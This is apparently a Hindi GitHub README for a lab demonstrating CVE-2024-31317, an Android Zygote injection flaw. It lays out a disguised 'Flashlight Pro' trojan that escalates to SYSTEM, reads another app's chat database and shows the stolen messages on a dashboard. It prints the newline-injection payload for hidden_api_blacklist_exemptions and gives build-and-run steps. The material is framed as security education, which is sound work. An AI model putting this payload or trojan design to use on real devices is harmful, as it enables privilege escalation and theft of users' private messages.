
Android पर CVE-2024-31317 Zygote Injection Vulnerability का शैक्षिक प्रदर्शन
यह प्रयोगशाला CVE-2024-31317 का प्रदर्शन करती है, जो एक गंभीर एंड्रॉइड भेद्यता है जो एक दुर्भावनापूर्ण ऐप को विशेषाधिकारों को SYSTEM स्तर (UID 1000) तक बढ़ाने और एंड्रॉइड सैंडबॉक्स को बायपास करके वास्तविक समय में अन्य अनुप्रयोगों से डेटा पढ़ने की अनुमति देती है।
ZygoteExploitDemo/
├── 📱 apps/
│ ├── SecureChat/ # पीड़ित ऐप (Jetpack Compose)
│ │ ├── SQLite में एन्क्रिप्टेड संदेश संग्रहीत
│ │ └── WhatsApp-शैली एन्क्रिप्शन का अनुकरण
│ │
│ ├── FlashlightPro/ # शोषण के साथ दुर्भावनापूर्ण ऐप
│ │ ├── सामान्य फ्लैशलाइट UI (ध्यान भटकाना)
│ │ ├── पृष्ठभूमि शोषण सेवा
│ │ └── WRITE_SECURE_SETTINGS अनुमति
│ │
│ └── MonitorService/ # SYSTEM-स्तरीय रीडर
│ ├── शोषण के बाद UID 1000 के साथ चलता है
│ ├── SecureChat डेटाबेस पढ़ता है
│ └── डैशबोर्ड पर डेटा बाहर निकालता है
│
├── 📊 dashboard/ # Flask वेब डैशबोर्ड
│ └── app.py # चुराए गए संदेशों को लाइव दिखाता है
│
├── 📜 scripts/ # स्वचालन स्क्रिप्ट
│ ├── setup_vulnerable_emulator.sh
│ ├── build_all_apps.sh
│ ├── install_all_apps.sh
│ ├── run_exploit.py
│ └── monitor_logs.sh
│
├── 🎯 exploits/ # शोषण जानकारी
│ ├── CVE-2024-31317.md
│ └── payloads.txt
│
└── 📁 tamplates/ # कोड टेम्पलेट
├── exploit_template.java
└── dashboard_template.html
CVE-2024-31317 उस तरीके में मौजूद है जिसमें एंड्रॉइड का Zygote प्रक्रिया hidden_api_blacklist_exemptions सिस्टम सेटिंग को संभालती है। इनपुट स्वच्छता की कमी के कारण, एक हमलावर Zygote कमांड में मनमाने तर्क जोड़ने के लिए न्यूलाइन वर्णों को इंजेक्ट कर सकता है।
हमला वेक्टर:
Settings.Global.putString(
contentResolver,
"hidden_api_blacklist_exemptions",
"LClass1;->method1(\n" +
"7\n" +
"--setuid=1000\n" + // SYSTEM के रूप में चलाएं
"--setgid=1000\n" + // SYSTEM समूह के रूप में चलाएं
"--invoke-with\n" +
"am start-service ...;\n"
);
| संस्करण | स्थिति |
|---|---|
| Android 9 - 14 | ❌ कमजोर (जून 2024 पैच से पहले) |
| Android 14+ | ✅ पैच किया गया (जून 2024 सुरक्षा अद्यतन) |
| Android 15+ | ✅ सुरक्षित |
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh
# एमुलेटर प्रारंभ करें
emulator -avd vulnerable_android_12
# एक नए टर्मिनल में
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh
cd ../dashboard
pip3 install flask flask-cors
python3 app.py
📱 अपने ब्राउज़र में http://localhost:5000 खोलें
cd ../scripts
python3 run_exploit.py
🎬 डेमो वीडियो जल्द ही आ रहा है
WRITE_SECURE_SETTINGS अनुमति का अनुरोध करता है/data/data/com.securechat/databases/ से पढ़ता हैयोगदान का स्वागत है! कृपया:
योगदान के क्षेत्र:
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें
Aman - @GitAmanS
यदि आपको यह शैक्षिक लगा, तो कृपया इसे एक स्टार दें! ⭐
सुरक्षा शोधकर्ताओं के लिए, एक सुरक्षा शोधकर्ता द्वारा बनाया गया
याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है 🕷️
| चरण | विवरण | दृश्य |
|---|
| 1 | उपयोगकर्ता "Flashlight Pro" नामक एक निर्दोष दिखने वाला ऐप इंस्टॉल करता है | 🔦 |
| 2 | ऐप SYSTEM पहुँच प्राप्त करने के लिए CVE-2024-31317 का शोषण करता है | 💉 |
| 3 | SYSTEM-स्तरीय सेवा "SecureChat" संदेश पढ़ती है | 👁️ |
| 4 | चुराए गए संदेश लाइव डैशबोर्ड पर दिखाई देते हैं | 📊 |